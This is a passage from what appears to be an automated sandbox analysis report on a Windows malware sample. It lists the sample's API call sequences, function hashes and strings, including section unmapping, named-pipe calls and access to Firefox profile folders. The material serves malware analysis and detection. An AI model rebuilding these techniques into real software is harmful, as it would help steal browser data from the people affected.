    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
